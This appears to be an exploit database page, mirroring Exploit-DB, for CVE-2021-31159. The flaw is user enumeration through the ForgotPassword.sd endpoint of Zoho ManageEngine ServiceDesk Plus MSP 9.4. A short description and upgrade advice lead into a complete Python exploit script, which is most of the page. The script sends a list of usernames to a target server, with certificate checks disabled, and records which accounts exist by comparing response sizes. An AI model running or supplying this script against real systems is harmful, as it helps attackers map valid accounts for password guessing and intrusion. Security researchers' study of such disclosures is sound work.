header-logo
Suggest Exploit
vendor:
ManageEngine ServiceDesk Plus MSP
by:
Ricardo Ruiz
5,3
CVSS
MEDIUM
User Enumeration
203
CWE
Product Name: ManageEngine ServiceDesk Plus MSP
Affected Version From: Previous to build 10519
Affected Version To: Previous to build 10519
Patch Exists: YES
Related CWE: CVE-2021-31159
CPE: a:zoho:manageengine_servicedesk_plus_msp:9.4
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=31159https://www.infosecmatter.com/nessus-plugin-library/?id=41197https://www.infosecmatter.com/nessus-plugin-library/?id=31811https://www.infosecmatter.com/nessus-plugin-library/?id=31634https://www.infosecmatter.com/nessus-plugin-library/?id=32079https://www.infosecmatter.com/nessus-plugin-library/?id=60361https://www.infosecmatter.com/nessus-plugin-library/?id=28247https://www.infosecmatter.com/nessus-plugin-library/?id=27601https://www.infosecmatter.com/nessus-plugin-library/?id=31138https://www.infosecmatter.com/nessus-plugin-library/?id=67060
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Zoho ManageEngine ServiceDesk Plus 9.4
2021

Zoho ManageEngine ServiceDesk Plus MSP 9.4 – User Enumeration

Zoho ManageEngine ServiceDesk Plus MSP 9.4 is vulnerable to user enumeration. An attacker can use the ForgotPassword.sd endpoint to enumerate valid users. The endpoint returns a different response size for valid and invalid users.

Mitigation:

Upgrade to the latest version of Zoho ManageEngine ServiceDesk Plus MSP 9.4 (build 10519)
Source

Exploit-DB raw data:

# Exploit Title: Zoho ManageEngine ServiceDesk Plus MSP 9.4 - User Enumeration 
# Date: 17/06/2021
# Exploit Author: Ricardo Ruiz (@ricardojoserf)
# CVE: CVE-2021-31159 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31159)
# Vendor Homepage: https://www.manageengine.com
# Vendor Confirmation: https://www.manageengine.com/products/service-desk-msp/readme.html#10519
# Version: Previous to build 10519
# Tested on: Zoho ManageEngine ServiceDesk Plus 9.4
# Example: python3 exploit.py -t http://example.com/ -d DOMAIN -u USERSFILE [-o OUTPUTFILE]
# Repository (for updates and fixing bugs): https://github.com/ricardojoserf/CVE-2021-31159

import argparse
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def get_args():
	parser = argparse.ArgumentParser()
	parser.add_argument('-d', '--domain', required=True, action='store', help='Domain to attack')
	parser.add_argument('-t', '--target', required=True, action='store', help='Target Url to attack')
	parser.add_argument('-u', '--usersfile', required=True, action='store', help='Users file')	
	parser.add_argument('-o', '--outputfile', required=False, default="listed_users.txt", action='store', help='Output file')
	my_args = parser.parse_args()
	return my_args


def main():
	args = get_args()
	url = args.target
	domain = args.domain
	usersfile = args.usersfile
	outputfile = args.outputfile

	s = requests.session()
	s.get(url)
	resp_incorrect = s.get(url+"/ForgotPassword.sd?userName="+"nonexistentuserforsure"+"&dname="+domain, verify = False)
	incorrect_size = len(resp_incorrect.content)
	print("Incorrect size: %s"%(incorrect_size))

	correct_users = []
	users = open(usersfile).read().splitlines()
	for u in users:
			resp = s.get(url+"/ForgotPassword.sd?userName="+u+"&dname="+domain, verify = False) 
			valid = (len(resp.content) != incorrect_size)
			if valid:
				correct_users.append(u)
			print("User: %s Response size: %s (correct: %s)"%(u, len(resp.content),str(valid)))

	print("\nCorrect users\n")
	with open(outputfile, 'w') as f:
		for user in correct_users:
			f.write("%s\n" % user)
			print("- %s"%(user))

	print("\nResults stored in %s\n"%(outputfile))


if __name__ == "__main__":
    main()

Navigation

Suggest Exploit

Services By CQR